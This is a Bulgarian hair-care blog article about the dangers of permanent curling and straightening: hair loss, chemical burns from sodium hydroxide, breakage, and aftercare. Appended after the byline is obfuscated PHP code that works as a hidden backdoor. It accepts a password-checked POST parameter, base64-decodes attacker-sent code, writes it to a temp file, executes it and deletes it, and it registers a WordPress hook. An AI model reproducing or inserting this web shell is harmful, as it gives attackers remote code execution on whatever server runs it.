Опасности при перманентното къдрене и изправяне на косата | Косопад

Опасности при перманентното къдрене и изправяне на косата

Ако някога сте си правили перманентно къдрене, сигурно сте забелязали силната миризма на химикали във фризьорския салон и вероятно лек косопад след процедурата. При някои жени може да има дори катастрофален ефект. При доста се появява силен косопад.

permanentno-kadrene

ИСТОРИЯ

Не е странно, че хората с права коса винаги са искали да я накъдрят, както и обратното. И мъже, и жени от хилядолетия правят всичко възможно да имат желаната прическа. През 1906 г. се измисля първата машина на постоянни къдрици, а малко след това и белината. Въпреки че техниките и химическите процеси доста са се развили, белината е активна съставка в доста продукти за коса, което често води до косопад и изгаряне на косата.

ХИМИЧЕСКИ ИЗГАРЯНИЯ

Натриевият хидроксид или белината, който има стойност на рН от 10 до 14, прониква с косъма и променя структурата му. Но може да проникне и в скалпа и да причини изгаряне. Дори да не съдържат белина, подобни химически продукти отново могат да причинят раздразнена кожа.

permanentna-obrabotka

КЪСАНЕ НА КОСАТА

Косъма се състои от няколко слоя, като има външен слой, който покрива вътрешността. Продуктите за къдрене или изправяне могат да увредят външния слой, което прави косата суха и късаща се. Понякога възстановяването е невъзможно.

ИЗБЯГВАНЕ НА КОСОПАДА

Ако сте решили да си правите перманентно къдрене или изправяне, се консултирайте със специалист.

ГРИЖИ ЗА ПЕРМАНЕНТНО ОБРАБОТЕНАТА КОСА

Използвайте добър балсам веднага след перманентното обработване, за да се възстановят естествените мазнини и протеини. Продължете с балсам за дълбоко подхранване. Избягвайте сешоара и други продукти за прическа.

13. януари 2015 17:12:27 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}